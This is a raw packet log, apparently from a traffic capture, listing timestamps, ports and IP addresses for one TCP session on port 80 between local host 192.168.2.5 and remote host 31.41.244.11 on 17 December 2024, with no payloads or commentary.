Dec 17, 2024 06:03:10.035327911 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.035387039 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.035401106 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.035434008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.043817043 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.043833971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.043881893 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.043924093 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.052161932 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.052231073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.052248955 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.052277088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.060447931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.060518026 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.160362005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.160437107 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.160603046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.160665989 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.162463903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.162549019 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.162652969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.162718058 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.166811943 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.166871071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.166878939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.166949034 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.171123028 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.171199083 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.171251059 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.171308994 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.175252914 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.175328016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.175414085 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.175472975 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.179486990 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.179558992 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.179594040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.179668903 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.183953047 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.183964968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.184015036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.184043884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.187958002 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.188016891 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.188045979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.188106060 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.192307949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.192318916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.192370892 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.196459055 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.196511984 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.196548939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.196580887 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.200512886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.200584888 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.200773001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.200838089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.204709053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.204720020 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.204766989 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.208887100 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.208898067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.208949089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.213186979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.213267088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.213397026 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.213596106 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.217376947 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.217387915 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.217442989 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.221270084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.221364975 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.221373081 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.221434116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.225375891 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.225478888 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.225492001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.225550890 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.229552984 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.229613066 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.229677916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.229732037 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.233937979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.234013081 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.234210014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.234266043 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.237895966 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.237967968 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.238109112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.238161087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.242122889 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.242176056 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.242279053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.242427111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.246251106 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.246335983 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.246352911 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.246398926 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.250369072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.250448942 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.250464916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.250505924 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.280342102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.280355930 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.280441999 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.352591991 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.352880001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.352941036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.353180885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.354166985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.354279041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.354491949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.357662916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.357673883 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.357727051 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.360785007 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.360796928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.360841990 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.364447117 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.364458084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.364650965 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.367168903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.367235899 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.367305040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.367355108 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.372591972 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.372603893 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.372648954 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.372699022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.373332024 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.373394966 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.373471022 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.373528004 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.376204014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.376295090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.377440929 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.381278992 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.381289959 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.381357908 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.382050991 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.382128954 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.382184982 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.382247925 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.384990931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.385051012 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.385087013 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.385149002 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.387968063 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.388017893 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.388041973 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.388070107 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.390742064 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.390809059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.390979052 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.391036034 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.393752098 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.393764019 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.393817902 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.396651030 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.396704912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.396711111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.396749020 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.399399042 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.399462938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.399589062 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.399646044 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.402286053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.402349949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.402414083 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.402466059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.405297041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.405307055 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.405371904 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.408061981 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.408121109 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.408185959 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.408240080 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.409856081 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.409917116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.410002947 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.410056114 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.411807060 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.411818981 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.411868095 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.411899090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.413647890 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.413659096 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.413703918 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.415360928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.415395021 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.415427923 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.415455103 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.417064905 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.417119026 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.417126894 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.417175055 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.418895006 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.418905973 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.418967009 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.420561075 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.420615911 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.420840979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.420890093 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.422360897 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.422415972 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.422481060 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.422533989 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.424159050 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.424204111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.424487114 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.424535036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.425936937 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.426007986 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.426069975 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.426119089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.427702904 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.427757978 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.427823067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.427871943 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.429574013 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.429616928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.429636955 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.429665089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.431370020 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.431412935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.431437016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.431463957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.433187008 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.433197975 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.433242083 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.433311939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.434855938 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.434912920 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.434976101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.435023069 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.436682940 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.436729908 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.436743021 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.436777115 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.438435078 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.438484907 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.438561916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.438608885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.440290928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.440341949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.440346003 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.440385103 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.544791937 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.544850111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.545030117 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.545075893 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.545669079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.545681000 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.545720100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.545747042 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.547363997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.547410011 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.547646046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.547689915 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.549118996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.549168110 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.549190044 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.549235106 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.550842047 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.550904036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.551032066 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.551075935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.552644014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.552684069 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.552689075 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.552731991 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.554363012 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.554373980 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.554405928 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.554426908 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.555908918 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.555919886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.555972099 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.557539940 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.557549953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.557589054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.559016943 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.559077024 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.559140921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.559192896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.560589075 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.560637951 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.560702085 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.560749054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.562088966 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.562140942 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.562205076 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.562258959 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.563616991 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.563684940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.563700914 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.563755989 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.565051079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.565112114 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.565187931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.565228939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.566545010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.566600084 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.566653967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.566711903 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.568011045 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.568070889 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.568207979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.568264008 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.569533110 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.569592953 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.569696903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.569755077 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.570962906 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.571016073 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.571079969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.571139097 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.572437048 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.572510958 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.572588921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.572647095 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.573932886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.573991060 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.574028015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.574088097 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.575390100 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.575445890 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.575489044 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.575537920 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.577008963 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.577020884 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.577071905 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.578347921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.578408957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.578480959 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.578540087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.579893112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.579937935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.579962969 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.579994917 CET	49830	80	192.168.2.5	31.41.244.11
